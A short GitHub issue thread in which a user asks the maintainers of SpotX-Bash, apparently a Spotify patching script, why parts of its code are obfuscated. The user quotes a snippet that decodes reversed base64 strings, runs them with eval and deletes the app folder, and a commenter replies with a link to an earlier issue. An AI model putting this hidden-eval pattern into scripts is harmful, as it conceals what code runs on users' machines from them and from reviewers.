### ISSUE TITLE
Clarification Required on Obfuscated Code Segments

### ISSUE THREAD

**Issue by midoelhawy** [SpotX-Official/SpotX-Bash#52]
### 🧐 Have you fully read the README and viewed similar issues?

- [X] I have read the README
- [X] I have read the FAQ
- [X] I have checked previous issues, open and closed
- [X] I have completed all troubleshooting steps and the issue is not present on stock but returns after re-applying SpotX-Bash

### Сountry of your account

Spanish

### What is your Spotify Plan?

Free

### Do you have Spicetify installed?

Yes

### ℹ Computer information

```markdown
- Spotify version: 
- OS: 
- Shell:
```

### 📝 Description

I have noticed that several parts of the codebase are obfuscated, 
LIKE
```
mc01=$(echo "=kjQ59EeBNEZwhGWad2cq1Ub0QUSpRzRYtmVHJGcG1mWnF1VZZHetJ2M5ckWnFlbixGbHJGRCNlZ5hnMZdjUp9Ue502Y5ZVVmtmVtN2NSlmYjp0QJxWMDlkdoJTWsJUeld2dIZ2ZJlWTpZUbj5mUpl0Z3dkYxUjMMJjVHpldBlnY0FUejRXQTNFdBlmW0F0UjRXQDJWeWNTW" | rev | base64 --decode | base64 --decode)
mc02=$(echo "90TUmd2cU10ZRhVY0Y1RJdTSqp0KBlWS1hnRaxGeXFGaadUSrZkMiNXNyQmdSdUSwUzVaBHeyE1Zw42Yz5kMlt2bqNmdK52YGFDSaxmSzU2a0cEWpF0UaRXQ5J2bOdlWnNHSJhDeIlUaJpWWop0MatWSDlUaw42YoplVaNHbtp1NSlHT6J1VZZHetJ2M5ckU2VVVUBFaFpUaBlnY0FUaaRXQpNGaKdFT65EWalHZyIWeChFT0F0UjRXQDJWeWNTW" | rev | base64 --decode | base64 --decode)
eval "${mc01}"; eval "${mc02}"
printf "\xE2\x9C\x94\x20\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x65\x64\x20\x61\x6E\x64\x20\x69\x6E\x73\x74\x61\x6C\x6C\x69\x6E\x67\x20\x53\x70\x6F\x74\x69\x66\x79\n"
rm -rf "${appPath}" 2>/dev/null
mkdir "${appPath}"

```

Could you please provide the rationale behind this approach?

### 🖥️ Terminal Input/Output

*/*

**Comment by jetfir3** [comment]
https://github.com/SpotX-Official/SpotX-Bash/issues/43
